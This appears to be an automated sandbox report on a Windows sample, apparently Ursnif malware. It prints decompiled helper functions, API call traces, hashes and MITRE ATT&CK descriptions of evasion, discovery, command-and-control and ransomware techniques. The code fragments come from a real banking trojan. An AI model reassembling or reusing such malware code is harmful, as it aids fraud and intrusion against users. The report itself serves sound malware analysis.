Download Yara Rule

C-Code - Quality: 64%

			E02BD23C4(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t28 = E02BD3A63(_a4, _t26, __edi);
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x2bda348; // 0x9dd5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x2bdb50c; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x2bdb8d8; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E02BD5B56();
					_push( &_v64);
					if( *0x2bda100() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E02BD5B56();
				}
				return _t28;
			}

0x02bd23c4
0x02bd23cb
0x02bd23d9
0x02bd23dd
0x02bd23e7
0x02bd23ec
0x02bd23f1
0x02bd23f6
0x02bd2400
0x02bd240a
0x02bd240a
0x02bd2402
0x02bd2402
0x02bd2402
0x02bd2402
0x02bd2410
0x02bd2416
0x02bd2417
0x02bd241a
0x02bd241d
0x02bd2420
0x02bd2428
0x02bd2431
0x02bd2439
0x02bd2439
0x02bd243b
0x02bd243d
0x02bd243d
0x02bd2447

APIs

Part of subcall function 02BD3A63: SysAllocString.OLEAUT32(00000000), ref: 02BD3ABD
Part of subcall function 02BD3A63: SysAllocString.OLEAUT32(0070006F), ref: 02BD3AD1
Part of subcall function 02BD3A63: SysAllocString.OLEAUT32(00000000), ref: 02BD3AE3

memset.NTDLL ref: 02BD23E7
GetLastError.KERNEL32 ref: 02BD2433

Strings

<, xrefs: 02BD23F6
@MqtNqt, xrefs: 02BD2433

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: AllocString$ErrorLastmemset
String ID: <$@MqtNqt
API String ID: 3736384471-349977332
Opcode ID: a046ad0f53194b5c84590ccc66bf857ceda445103b9d2bb8fef78c9de605ae72
Instruction ID: b1746d9ca7cf59044076f5cec92d927abf9e6caf41edf2712c8169614f983cf3
Opcode Fuzzy Hash: a046ad0f53194b5c84590ccc66bf857ceda445103b9d2bb8fef78c9de605ae72
Instruction Fuzzy Hash: 2B014C71D01218AFCB10EFA8D884ECEBBB8EB08754F4584A6FE14E7241F77099408FA1

Uniqueness

Uniqueness Score: -1.00%

Function 02BD7843 Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD7843(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x02bd784d
0x02bd7851
0x02bd7866
0x02bd7868
0x02bd786d
0x02bd7873
0x02bd7875
0x02bd787a
0x02bd7885
0x02bd787c
0x02bd787c
0x02bd787c
0x02bd787a
0x02bd7893

APIs

memset.NTDLL ref: 02BD7851
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,747581D0,00000000,00000000), ref: 02BD7866
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02BD7873
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02BD3F34,00000000,?), ref: 02BD7885

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 42d574f1b60387c6a9e9c4fd9dc9fc42e0991a1bbe635a35b56cca8be36c1490
Instruction ID: 2d58586ee5ed730ef41f52d25b9bc872b185d6e702ad10f62bde529c9f34e0ca
Opcode Fuzzy Hash: 42d574f1b60387c6a9e9c4fd9dc9fc42e0991a1bbe635a35b56cca8be36c1490
Instruction Fuzzy Hash: 40F089B154570C7FD3145F26ECC4CB7FB9CEB8119C7114D7DF14292111E772A8148AA0

Uniqueness

Uniqueness Score: -1.00%

Function 021912DC Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,02190F70), ref: 021912EB
GetVersion.KERNEL32(?,02190F70), ref: 021912FA
GetCurrentProcessId.KERNEL32(?,02190F70), ref: 02191316
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,02190F70), ref: 0219132F

Memory Dump Source

Source File: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2190000_server.jbxd

Yara matches

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
Instruction ID: a06d8769dc8540807e161df94735bec67f39759a6d66d35476c2ad45249c505f
Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
Instruction Fuzzy Hash: 13F031B0681301ABEF509F797E09B963F79A789722F100135E645FA1E4D77086C1CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 02BD3230 Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD3230() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x2bda30c; // 0x308
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x2bda35c; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x2bda30c; // 0x308
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x2bda2d8; // 0x31c0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x02bd3230
0x02bd3237
0x02bd3281
0x02bd3283
0x02bd3283
0x02bd323b
0x02bd3241
0x02bd3246
0x02bd324a
0x02bd3250
0x02bd3257
0x00000000
0x00000000
0x02bd3259
0x02bd325e
0x00000000
0x00000000
0x00000000
0x02bd325e
0x02bd3260
0x02bd3268
0x02bd326b
0x02bd326b
0x02bd3271
0x02bd3278
0x02bd327b
0x02bd327b
0x00000000

APIs

SetEvent.KERNEL32(00000308,00000001,02BD109A), ref: 02BD323B
SleepEx.KERNEL32(00000064,00000001), ref: 02BD324A
CloseHandle.KERNEL32(00000308), ref: 02BD326B
HeapDestroy.KERNEL32(031C0000), ref: 02BD327B

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 950af277803b3aa2fc50da2fd1d245b12c8d89e7236b6141f7458d0b230a379e
Instruction ID: 42644b8504d5a0d9941f192acb1a913eee194ebae0b66d454e12c745714e795e
Opcode Fuzzy Hash: 950af277803b3aa2fc50da2fd1d245b12c8d89e7236b6141f7458d0b230a379e
Instruction Fuzzy Hash: 98F03075E8275197DF105B39A9A8BC637D8EB047E1B084990BC40E32C2FB30D450CE61

Uniqueness

Uniqueness Score: -1.00%

Function 02BD2058 Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E02BD2058(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E02BD33DC(_t2);
				if(_t34 != 0) {
					_t30 = E02BD33DC(_t28);
					if(_t30 == 0) {
						E02BD61DA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E02BD7AE9(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E02BD7AE9(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x02bd2058
0x02bd2062
0x02bd2064
0x02bd206a
0x02bd206a
0x02bd2073
0x02bd2077
0x02bd2083
0x02bd2087
0x02bd20fb
0x02bd2089
0x02bd2089
0x02bd208d
0x02bd2092
0x02bd2097
0x02bd20b1
0x02bd20a0
0x02bd20a0
0x02bd20a4
0x02bd20a7
0x02bd20ac
0x02bd20ac
0x02bd20b6
0x02bd20de
0x02bd20e4
0x02bd20e7
0x02bd20b8
0x02bd20ba
0x02bd20c2
0x02bd20cd
0x02bd20d2
0x02bd20d2
0x02bd20ee
0x02bd20f5
0x02bd20f6
0x02bd20f6
0x02bd2087
0x02bd2106

APIs

lstrlen.KERNEL32(00000000,00000008,?,74714D40,?,?,02BD51F7,?,?,?,?,00000102,02BD21E7,?,?,747581D0), ref: 02BD2064

Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8

Part of subcall function 02BD7AE9: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02BD2092,00000000,00000001,00000001,?,?,02BD51F7,?,?,?,?,00000102), ref: 02BD7AF7
Part of subcall function 02BD7AE9: StrChrA.SHLWAPI(?,0000003F,?,?,02BD51F7,?,?,?,?,00000102,02BD21E7,?,?,747581D0,00000000), ref: 02BD7B01

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02BD51F7,?,?,?,?,00000102,02BD21E7,?), ref: 02BD20C2
lstrcpy.KERNEL32(00000000,00000000), ref: 02BD20D2
lstrcpy.KERNEL32(00000000,00000000), ref: 02BD20DE

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 2d48be46b7a6996eda33b4b4b49b875b370b26d256c11f8909c16d52aeea006a
Instruction ID: ab8c9cb01fa9c9e2df48ece2118e792c995e6258187956376c23e26fc58d9956
Opcode Fuzzy Hash: 2d48be46b7a6996eda33b4b4b49b875b370b26d256c11f8909c16d52aeea006a
Instruction Fuzzy Hash: 9A219072500296EBCB129F68DC54ADABFB9EF45290B5480D5FD099B202FB31D941CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02BD5DE4 Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD5DE4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E02BD33DC(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x02bd5df9
0x02bd5dfd
0x02bd5e07
0x02bd5e0c
0x02bd5e11
0x02bd5e13
0x02bd5e1b
0x02bd5e20
0x02bd5e2e
0x02bd5e33
0x02bd5e3d

APIs

lstrlenW.KERNEL32(004F0053,?,74715520,00000008,035B9270,?,02BD52D0,004F0053,035B9270,?,?,?,?,?,?,02BD68B6), ref: 02BD5DF4
lstrlenW.KERNEL32(02BD52D0,?,02BD52D0,004F0053,035B9270,?,?,?,?,?,?,02BD68B6), ref: 02BD5DFB

Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8

memcpy.NTDLL(00000000,004F0053,747169A0,?,?,02BD52D0,004F0053,035B9270,?,?,?,?,?,?,02BD68B6), ref: 02BD5E1B
memcpy.NTDLL(747169A0,02BD52D0,00000002,00000000,004F0053,747169A0,?,?,02BD52D0,004F0053,035B9270), ref: 02BD5E2E

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 5fe9bdde1005337b5a002fd52ebf7c32bc44b8dc0bca2ee744f05ee1ce99fddc
Instruction ID: d953914d82aea308e8060a4bea07730c58c4371d68a48a439b445d703a0066de
Opcode Fuzzy Hash: 5fe9bdde1005337b5a002fd52ebf7c32bc44b8dc0bca2ee744f05ee1ce99fddc
Instruction Fuzzy Hash: 34F04F72900119BBCF11EFA8CC84CCE7BADEF0835475140A2ED18D7101F731EA108BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02BD7563 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(035B9C38,00000000,00000000,00000000,02BD3EF9,00000000), ref: 02BD7573
lstrlen.KERNEL32(?), ref: 02BD757B

Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8

lstrcpy.KERNEL32(00000000,035B9C38), ref: 02BD758F
lstrcat.KERNEL32(00000000,?), ref: 02BD759A

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 3bc096ff975a80e8aac224315ecf0bd9e9d326a52a96e5e9f512e2fd5ffd47b8
Instruction ID: 35c353fccc30623cbbf42ec832d901380ad177ef1a372d3aa633953751da4694
Opcode Fuzzy Hash: 3bc096ff975a80e8aac224315ecf0bd9e9d326a52a96e5e9f512e2fd5ffd47b8
Instruction Fuzzy Hash: 10E09233902A20AB87116BA8BC48CDFFBBDFF896A0304485AF600D3101EB319811CBA5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report server.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Ursnif

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
server.exe

Function 004019F1 Relevance: 27.2, APIs: 18, Instructions: 160
threadsleepnativeCOMMON

Function 02BD1508 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163
encryptionCOMMON

Function 02BD3BD3 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103
memoryCOMMON

Function 02BD421F Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 004015B0 Relevance: 10.6, APIs: 7, Instructions: 81
filetimeCOMMON

Function 0040110B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 00401459 Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 02BD3CE0 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 222
memorystringCOMMON

Function 02BD7B83 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 126
networkstringCOMMON

Function 02BD6815 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 151
timememoryCOMMON

Function 02BD7FC5 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 209
libraryCOMMON

Function 02BD415A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72
filetimeCOMMON

Function 02BD4BE7 Relevance: 12.1, APIs: 8, Instructions: 75
networkCOMMON

Function 02BD5E40 Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 02BD6675 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Function 00401202 Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 02BD51D8 Relevance: 9.0, APIs: 6, Instructions: 45
networkCOMMON

Function 02BD2523 Relevance: 7.7, APIs: 5, Instructions: 161
memoryCOMMON

Function 00401DE1 Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Function 02BD5251 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

